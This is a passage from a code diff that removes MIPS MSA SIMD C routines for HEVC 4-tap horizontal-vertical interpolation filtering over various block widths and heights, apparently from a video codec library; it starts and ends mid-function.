tmp2, tmp3, tmp4, tmp5; - v8i16 dst10_r, dst32_r, dst54_r, dst76_r, dst98_r, dst21_r, dst43_r; - v8i16 
dst65_r, dst87_r, dst109_r, dst10_l, dst32_l, dst54_l, dst76_l; - v8i16 dst98_l, dst21_l, dst43_l, dst65_l, dst87_l, dst109_l; - v8i16 dst1021_l, dst3243_l, dst5465_l, dst7687_l, dst98109_l; - v4i32 dst0_r, dst1_r, dst2_r, dst3_r, dst4_r, dst5_r, dst6_r, dst7_r; - v4i32 dst0_l, dst1_l, dst2_l, dst3_l; - - src -= (src_stride + 1); - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec4, vec5); - - dsth0 = const_vec; - dsth1 = const_vec; - dsth2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dsth0, dsth0); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dsth1, dsth1); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dsth2, dsth2); - - ILVRL_H2_SH(dsth1, dsth0, dst10_r, dst10_l); - ILVRL_H2_SH(dsth2, dsth1, dst21_r, dst21_l); - - LD_SB8(src, src_stride, src3, src4, src5, src6, src7, src8, src9, src10); - XORI_B8_128_SB(src3, src4, src5, src6, src7, src8, src9, src10); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec6, vec7); - - dsth3 = const_vec; - dsth4 = const_vec; - dsth5 = const_vec; - dsth6 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dsth3, dsth3); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dsth4, dsth4); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dsth5, dsth5); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dsth6, dsth6); - - VSHF_B2_SB(src7, src7, src7, src7, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src8, src8, src8, src8, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src9, src9, src9, src9, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src10, src10, src10, src10, mask0, mask1, vec6, vec7); - - dsth7 = const_vec; - dsth8 = const_vec; - dsth9 = const_vec; - dsth10 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dsth7, dsth7); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dsth8, dsth8); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dsth9, dsth9); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dsth10, dsth10); - - ILVRL_H2_SH(dsth3, dsth2, dst32_r, dst32_l); - ILVRL_H2_SH(dsth4, dsth3, dst43_r, dst43_l); - ILVRL_H2_SH(dsth5, dsth4, dst54_r, dst54_l); - ILVRL_H2_SH(dsth6, dsth5, dst65_r, dst65_l); - ILVRL_H2_SH(dsth7, dsth6, dst76_r, dst76_l); - ILVRL_H2_SH(dsth8, dsth7, dst87_r, dst87_l); - ILVRL_H2_SH(dsth9, dsth8, dst98_r, dst98_l); - ILVRL_H2_SH(dsth10, dsth9, dst109_r, dst109_l); - - PCKEV_D2_SH(dst21_l, dst10_l, dst43_l, dst32_l, dst1021_l, dst3243_l); - PCKEV_D2_SH(dst65_l, dst54_l, dst87_l, dst76_l, dst5465_l, dst7687_l); - dst98109_l = (v8i16) __msa_pckev_d((v2i64) dst109_l, (v2i64) dst98_l); - - dst0_r = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst1_r = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst2_r = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - dst3_r = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - dst4_r = HEVC_FILT_4TAP(dst54_r, dst76_r, filt_h0, filt_h1); - dst5_r = HEVC_FILT_4TAP(dst65_r, dst87_r, filt_h0, filt_h1); - dst6_r = HEVC_FILT_4TAP(dst76_r, 
dst98_r, filt_h0, filt_h1); - dst7_r = HEVC_FILT_4TAP(dst87_r, dst109_r, filt_h0, filt_h1); - dst0_l = HEVC_FILT_4TAP(dst1021_l, dst3243_l, filt_h0, filt_h1); - dst1_l = HEVC_FILT_4TAP(dst3243_l, dst5465_l, filt_h0, filt_h1); - dst2_l = HEVC_FILT_4TAP(dst5465_l, dst7687_l, filt_h0, filt_h1); - dst3_l = HEVC_FILT_4TAP(dst7687_l, dst98109_l, filt_h0, filt_h1); - SRA_4V(dst0_r, dst1_r, dst2_r, dst3_r, 6); - SRA_4V(dst4_r, dst5_r, dst6_r, dst7_r, 6); - SRA_4V(dst0_l, dst1_l, dst2_l, dst3_l, 6); - PCKEV_H2_SH(dst1_r, dst0_r, dst3_r, dst2_r, tmp0, tmp1); - PCKEV_H2_SH(dst5_r, dst4_r, dst7_r, dst6_r, tmp2, tmp3); - PCKEV_H2_SH(dst1_l, dst0_l, dst3_l, dst2_l, tmp4, tmp5); - ST_D4(tmp0, tmp1, 0, 1, 0, 1, dst, dst_stride); - ST_W4(tmp4, 0, 1, 2, 3, dst + 4, dst_stride); - dst += 4 * dst_stride; - ST_D4(tmp2, tmp3, 0, 1, 0, 1, dst, dst_stride); - ST_W4(tmp5, 0, 1, 2, 3, dst + 4, dst_stride); -} - -static void hevc_hv_4t_8x2_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y) -{ - v16i8 src0, src1, src2, src3, src4; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7, vec8, vec9; - v8i16 dst0, dst1, dst2, dst3, dst4; - v4i32 dst0_r, dst0_l, dst1_r, dst1_l; - v8i16 dst10_r, dst32_r, dst21_r, dst43_r; - v8i16 dst10_l, dst32_l, dst21_l, dst43_l; - - src -= (src_stride + 1); - - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB5(src, src_stride, src0, src1, src2, src3, src4); - XORI_B5_128_SB(src0, src1, src2, src3, src4); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec6, vec7); - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec8, vec9); - - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - dst1 = const_vec; - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst1, dst1); - dst2 = const_vec; - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst2, dst2); - dst3 = const_vec; - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst3, dst3); - dst4 = const_vec; - DPADD_SB2_SH(vec8, vec9, filt0, filt1, dst4, dst4); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst2, dst1, dst21_r, dst21_l); - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst4, dst3, dst43_r, dst43_l); - dst0_r = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst0_l = HEVC_FILT_4TAP(dst10_l, dst32_l, filt_h0, filt_h1); - dst1_r = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst1_l = HEVC_FILT_4TAP(dst21_l, dst43_l, filt_h0, filt_h1); - SRA_4V(dst0_r, dst0_l, dst1_r, dst1_l, 6); - PCKEV_H2_SW(dst0_l, dst0_r, dst1_l, dst1_r, dst0_r, dst1_r); - ST_SW2(dst0_r, dst1_r, dst, dst_stride); -} - -static void hevc_hv_4t_8multx4_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, int32_t width8mult) -{ - int32_t cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, mask0, mask1; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v8i16 filt0, filt1, filt_h0, filt_h1, filter_vec, 
const_vec; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6; - v8i16 dst10_r, dst32_r, dst54_r, dst21_r, dst43_r, dst65_r; - v8i16 dst10_l, dst32_l, dst54_l, dst21_l, dst43_l, dst65_l; - v4i32 dst0_r, dst0_l, dst1_r, dst1_l, dst2_r, dst2_l, dst3_r, dst3_l; - - src -= (src_stride + 1); - - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask0 = LD_SB(ff_hevc_mask_arr); - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (cnt = width8mult; cnt--;) { - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - src += 8; - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec4, vec5); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst1, dst1); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst2, dst2); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst2, dst1, dst21_r, dst21_l); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec6, vec7); - dst3 = const_vec; - dst4 = const_vec; - dst5 = const_vec; - dst6 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst4, dst4); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst5, dst5); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst6, dst6); - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst4, dst3, dst43_r, dst43_l); - ILVRL_H2_SH(dst5, dst4, dst54_r, dst54_l); - ILVRL_H2_SH(dst6, dst5, dst65_r, dst65_l); - dst0_r = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst0_l = HEVC_FILT_4TAP(dst10_l, dst32_l, filt_h0, filt_h1); - dst1_r = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst1_l = HEVC_FILT_4TAP(dst21_l, dst43_l, filt_h0, filt_h1); - - dst2_r = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - dst2_l = HEVC_FILT_4TAP(dst32_l, dst54_l, filt_h0, filt_h1); - dst3_r = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - dst3_l = HEVC_FILT_4TAP(dst43_l, dst65_l, filt_h0, filt_h1); - SRA_4V(dst0_r, dst0_l, dst1_r, dst1_l, 6); - SRA_4V(dst2_r, dst2_l, dst3_r, dst3_l, 6); - PCKEV_H2_SW(dst0_l, dst0_r, dst1_l, dst1_r, dst0_r, dst1_r); - PCKEV_H2_SW(dst2_l, dst2_r, dst3_l, dst3_r, dst2_r, dst3_r); - - ST_SW4(dst0_r, dst1_r, dst2_r, dst3_r, dst, dst_stride); - dst += 8; - } -} - -static void hevc_hv_4t_8x6_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y) -{ - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7, vec8, vec9; - v16i8 vec10, vec11, vec12, vec13, vec14, vec15, vec16, vec17; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst7, dst8; - v4i32 dst0_r, dst0_l, dst1_r, dst1_l, dst2_r, dst2_l, dst3_r, dst3_l; - v4i32 dst4_r, dst4_l, dst5_r, dst5_l; - v8i16 dst10_r, dst32_r, dst10_l, dst32_l; - v8i16 
dst21_r, dst43_r, dst21_l, dst43_l; - v8i16 dst54_r, dst54_l, dst65_r, dst65_l; - v8i16 dst76_r, dst76_l, dst87_r, dst87_l; - - src -= (src_stride + 1); - - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB5(src, src_stride, src0, src1, src2, src3, src4); - src += (5 * src_stride); - LD_SB4(src, src_stride, src5, src6, src7, src8); - - XORI_B5_128_SB(src0, src1, src2, src3, src4); - XORI_B4_128_SB(src5, src6, src7, src8); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec6, vec7); - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec8, vec9); - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec10, vec11); - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec12, vec13); - VSHF_B2_SB(src7, src7, src7, src7, mask0, mask1, vec14, vec15); - VSHF_B2_SB(src8, src8, src8, src8, mask0, mask1, vec16, vec17); - - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - dst1 = const_vec; - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst1, dst1); - dst2 = const_vec; - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst2, dst2); - dst3 = const_vec; - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst3, dst3); - dst4 = const_vec; - DPADD_SB2_SH(vec8, vec9, filt0, filt1, dst4, dst4); - dst5 = const_vec; - DPADD_SB2_SH(vec10, vec11, filt0, filt1, dst5, dst5); - dst6 = const_vec; - DPADD_SB2_SH(vec12, vec13, filt0, filt1, dst6, dst6); - dst7 = const_vec; - DPADD_SB2_SH(vec14, vec15, filt0, filt1, dst7, dst7); - dst8 = const_vec; - DPADD_SB2_SH(vec16, vec17, filt0, filt1, dst8, dst8); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst2, dst1, dst21_r, dst21_l); - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst4, dst3, dst43_r, dst43_l); - ILVRL_H2_SH(dst5, dst4, dst54_r, dst54_l); - ILVRL_H2_SH(dst6, dst5, dst65_r, dst65_l); - ILVRL_H2_SH(dst7, dst6, dst76_r, dst76_l); - ILVRL_H2_SH(dst8, dst7, dst87_r, dst87_l); - - dst0_r = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst0_l = HEVC_FILT_4TAP(dst10_l, dst32_l, filt_h0, filt_h1); - dst1_r = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst1_l = HEVC_FILT_4TAP(dst21_l, dst43_l, filt_h0, filt_h1); - dst2_r = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - dst2_l = HEVC_FILT_4TAP(dst32_l, dst54_l, filt_h0, filt_h1); - dst3_r = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - dst3_l = HEVC_FILT_4TAP(dst43_l, dst65_l, filt_h0, filt_h1); - dst4_r = HEVC_FILT_4TAP(dst54_r, dst76_r, filt_h0, filt_h1); - dst4_l = HEVC_FILT_4TAP(dst54_l, dst76_l, filt_h0, filt_h1); - dst5_r = HEVC_FILT_4TAP(dst65_r, dst87_r, filt_h0, filt_h1); - dst5_l = HEVC_FILT_4TAP(dst65_l, dst87_l, filt_h0, filt_h1); - - SRA_4V(dst0_r, dst0_l, dst1_r, dst1_l, 6); - SRA_4V(dst2_r, dst2_l, dst3_r, dst3_l, 6); - SRA_4V(dst4_r, dst4_l, dst5_r, dst5_l, 6); - - PCKEV_H4_SW(dst0_l, dst0_r, dst1_l, dst1_r, - dst2_l, dst2_r, dst3_l, dst3_r, dst0_r, dst1_r, dst2_r, dst3_r); - PCKEV_H2_SW(dst4_l, dst4_r, dst5_l, dst5_r, dst4_r, dst5_r); - - ST_SW2(dst0_r, dst1_r, dst, dst_stride); - dst += (2 * dst_stride); - ST_SW2(dst2_r, dst3_r, dst, dst_stride); - dst += (2 * dst_stride); - ST_SW2(dst4_r, dst5_r, dst, dst_stride); -} - 
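The hv kernels above all follow the same two-stage scheme: a horizontal 4-tap pass over the XOR-biased source bytes into 16-bit intermediates (const_vec = 128 << 6 cancels the XORI-by-128 bias because the taps sum to 64), then a vertical 4-tap pass over those intermediates with a final arithmetic shift right by 6 (SRA_4V(..., 6)). A minimal scalar sketch of that computation for 8-bit input follows; the function name, parameters and loop bounds are illustrative only and do not appear in this file.

#include <stdint.h>

/* Hypothetical scalar model of the hv 4-tap path: src is assumed to already
 * point one row up and one column left of the block, as after the
 * "src -= (src_stride + 1)" adjustment in the kernels above. */
static void hevc_hv_4tap_scalar(const uint8_t *src, int src_stride,
                                int16_t *dst, int dst_stride,
                                const int8_t *filt_x, const int8_t *filt_y,
                                int width, int height)
{
    for (int y = 0; y < height; y++) {
        for (int x = 0; x < width; x++) {
            int32_t v = 0;
            for (int k = 0; k < 4; k++) {       /* vertical taps */
                int32_t h = 0;
                for (int j = 0; j < 4; j++)     /* horizontal taps */
                    h += filt_x[j] * src[(y + k) * src_stride + x + j];
                v += filt_y[k] * h;             /* h stays within 16 bits for 8-bit input */
            }
            dst[y * dst_stride + x] = (int16_t)(v >> 6);  /* same shift as SRA_4V(..., 6) */
        }
    }
}

The single-pass hz and vt kernels correspond to just the inner or outer tap loop of this model, storing the one-dimensional 4-tap sum directly as the 16-bit intermediate with no final shift for 8-bit input.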
-static void hevc_hv_4t_8multx4mult_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height, - int32_t width8mult) -{ - uint32_t loop_cnt, cnt; - const uint8_t *src_tmp; - int16_t *dst_tmp; - v16i8 src0, src1, src2, src3, src4, src5, src6; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6; - v4i32 dst0_r, dst0_l, dst1_r, dst1_l, dst2_r, dst2_l, dst3_r, dst3_l; - v8i16 dst10_r, dst32_r, dst54_r, dst21_r, dst43_r, dst65_r; - v8i16 dst10_l, dst32_l, dst54_l, dst21_l, dst43_l, dst65_l; - - src -= (src_stride + 1); - - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (cnt = width8mult; cnt--;) { - src_tmp = src; - dst_tmp = dst; - - LD_SB3(src_tmp, src_stride, src0, src1, src2); - src_tmp += (3 * src_stride); - - XORI_B3_128_SB(src0, src1, src2); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec4, vec5); - - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - dst1 = const_vec; - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst1, dst1); - dst2 = const_vec; - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst2, dst2); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst2, dst1, dst21_r, dst21_l); - - for (loop_cnt = height >> 2; loop_cnt--;) { - LD_SB4(src_tmp, src_stride, src3, src4, src5, src6); - src_tmp += (4 * src_stride); - XORI_B4_128_SB(src3, src4, src5, src6); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec6, vec7); - - dst3 = const_vec; - dst4 = const_vec; - dst5 = const_vec; - dst6 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst4, dst4); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst5, dst5); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst6, dst6); - - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst4, dst3, dst43_r, dst43_l); - ILVRL_H2_SH(dst5, dst4, dst54_r, dst54_l); - ILVRL_H2_SH(dst6, dst5, dst65_r, dst65_l); - - dst0_r = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst0_l = HEVC_FILT_4TAP(dst10_l, dst32_l, filt_h0, filt_h1); - dst1_r = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst1_l = HEVC_FILT_4TAP(dst21_l, dst43_l, filt_h0, filt_h1); - dst2_r = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - dst2_l = HEVC_FILT_4TAP(dst32_l, dst54_l, filt_h0, filt_h1); - dst3_r = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - dst3_l = HEVC_FILT_4TAP(dst43_l, dst65_l, filt_h0, filt_h1); - - SRA_4V(dst0_r, dst0_l, dst1_r, dst1_l, 6); - SRA_4V(dst2_r, dst2_l, dst3_r, dst3_l, 6); - - PCKEV_H4_SW(dst0_l, dst0_r, dst1_l, dst1_r, - dst2_l, dst2_r, dst3_l, dst3_r, - dst0_r, dst1_r, dst2_r, dst3_r); - - ST_SW4(dst0_r, dst1_r, dst2_r, dst3_r, dst_tmp, dst_stride); - dst_tmp += (4 * dst_stride); - - dst10_r = dst54_r; - dst10_l = 
dst54_l; - dst21_r = dst65_r; - dst21_l = dst65_l; - dst2 = dst6; - } - - src += 8; - dst += 8; - } -} - -static void hevc_hv_4t_8w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - - if (2 == height) { - hevc_hv_4t_8x2_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y); - } else if (4 == height) { - hevc_hv_4t_8multx4_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, 1); - } else if (6 == height) { - hevc_hv_4t_8x6_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y); - } else if (0 == (height % 4)) { - hevc_hv_4t_8multx4mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 1); - } -} - -static void hevc_hv_4t_12w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - uint32_t loop_cnt; - const uint8_t *src_tmp; - int16_t *dst_tmp; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v16i8 mask0, mask1, mask2, mask3; - v8i16 filt0, filt1, filt_h0, filt_h1, filter_vec, const_vec; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst10, dst21, dst22, dst73; - v8i16 dst84, dst95, dst106, dst76_r, dst98_r, dst87_r, dst109_r; - v8i16 dst10_r, dst32_r, dst54_r, dst21_r, dst43_r, dst65_r; - v8i16 dst10_l, dst32_l, dst54_l, dst21_l, dst43_l, dst65_l; - v4i32 dst0_r, dst0_l, dst1_r, dst1_l, dst2_r, dst2_l, dst3_r, dst3_l; - v4i32 tmp0, tmp1, tmp2, tmp3, tmp4, tmp5, tmp6, tmp7; - - src -= (src_stride + 1); - - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask0 = LD_SB(ff_hevc_mask_arr); - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - src_tmp = src; - dst_tmp = dst; - - LD_SB3(src_tmp, src_stride, src0, src1, src2); - src_tmp += (3 * src_stride); - - XORI_B3_128_SB(src0, src1, src2); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec4, vec5); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst1, dst1); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst2, dst2); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst2, dst1, dst21_r, dst21_l); - - for (loop_cnt = 4; loop_cnt--;) { - LD_SB4(src_tmp, src_stride, src3, src4, src5, src6); - src_tmp += (4 * src_stride); - XORI_B4_128_SB(src3, src4, src5, src6); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec6, vec7); - - dst3 = const_vec; - dst4 = const_vec; - dst5 = const_vec; - dst6 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst4, dst4); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst5, dst5); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst6, dst6); - - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst4, dst3, dst43_r, dst43_l); - ILVRL_H2_SH(dst5, dst4, dst54_r, dst54_l); - ILVRL_H2_SH(dst6, dst5, dst65_r, dst65_l); - - 
